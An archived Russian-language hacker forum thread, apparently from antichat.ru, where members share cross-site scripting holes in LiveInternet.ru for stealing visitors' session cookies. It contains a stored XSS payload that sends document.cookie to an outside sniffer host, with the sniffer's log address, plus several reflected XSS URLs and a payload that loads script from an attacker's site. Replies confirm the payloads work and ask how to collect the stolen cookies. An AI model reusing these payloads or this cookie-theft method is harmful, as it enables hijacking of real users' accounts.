PDA

Просмотр полной версии : XSS в дневнике LiveInternet.ru


InferNo23
13.12.2006, 12:10
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах" <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.

-FARAON2005RAMSES-
13.12.2006, 19:30
О! санкс! всё пашет!

DimOnOID
13.12.2006, 19:34
да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят...

slider
14.12.2006, 19:23
http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль:
не фильтруется!

†Romi4†
14.12.2006, 20:06
)) прикольно,лови +

Petr
15.12.2006, 02:54
Туплю, не нашел этот пункт :(
Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами :(

-FARAON2005RAMSES-
22.12.2006, 16:50
именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь.

Zadoxlik
22.12.2006, 19:20
Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)

*D1VER
22.12.2006, 20:37
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorder=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

ReanimatoR
28.12.2006, 12:52
PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url=http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><script src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check=mikmik&keywords=&private=&subscribe=on&group=ru&group=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+

Noman
28.12.2006, 19:55
Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил.

во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r :)

Petr
13.01.2007, 22:22
если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его
если не прав объясните что значит пасивный.

пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r)

re-arranged
27.02.2007, 22:03
ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.

+toxa+
27.02.2007, 23:08
http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorder=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!
Это другой серв....

freddi
27.02.2007, 23:28
2 re-arranged

http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=729772&userownid=undefined"><script>alert("xss")</script>

пассивная

DeadFire
01.03.2007, 00:39
Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах" <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.


А что дальше делать?

Куки отправляются на снифф общий? если да, то я не могу найти его лог =/

Зы: или это уже вообще не катит?


ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
+1 =)

InferNo23
01.03.2007, 06:18
Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть..
2DeadFire лог теперь на old.antichat.ru
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Log: http://old.antichat.ru/sniff/log.php

DeadFire
03.03.2007, 15:44
Объясните плз для тупых что нужно сделать по шагам.

Зы: там скрипты отсеиваются

Зыы: я создал юзера (Vasssssia (http://www.liveinternet.ru/users/vasssssia/profile/)) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит..
приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока...

Зыыы: за лог спасибо

re-arranged
08.03.2007, 23:02
2InferNo23 тысяча чертей, отсеиваются <script> </script>.

LeopardSS
25.07.2007, 23:59
я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?

Piflit
26.07.2007, 00:05
по теме: уязвимость еще существует?

LeopardSS
26.07.2007, 01:07
короче так, для теста зарегал акк. Зашел под ним, посмотрел в куках bbpassword имеет значение 1008cac831727c728c87294fe37fd18c что не соответствует мд5хэшу введеного пароля 233223 ; значит другой алгоритм шифрования?

n0ne
26.07.2007, 01:31
LeopardSS, врятли, скорее всего это временный "пароль", присвоенный сессии, до её истечения, т.е. пока ты не нажмешь "выйти".

BoxANG
08.08.2007, 14:37
Там соль добавляется(((

BoxANG
11.08.2007, 14:45
Пассивный...
http://www.liveinternet.ru/showjournal.php?action=draft&journalid="><script>alert(123)</script>

smc
24.03.2010, 17:55
никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю

f1ng3r
24.03.2010, 18:05
никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю

археолог :confused:

smc
24.03.2010, 18:20
сам знаю - старую тему поднял. но вместо того чтобы шутить посоветовал бы что-нибудь

xor[jmp]
30.03.2010, 21:35
никто не подскажет где xss искать на ли.ру? старые дыры админы залатали, а новых я найти не сумел -не на столько про...
если не жалко поделиться, то пишите в личку (обещаю использовать разумно и не сливыть в паблик ни на ачате ни в других местах).
заранее благодарю
В полях и запросах ^_^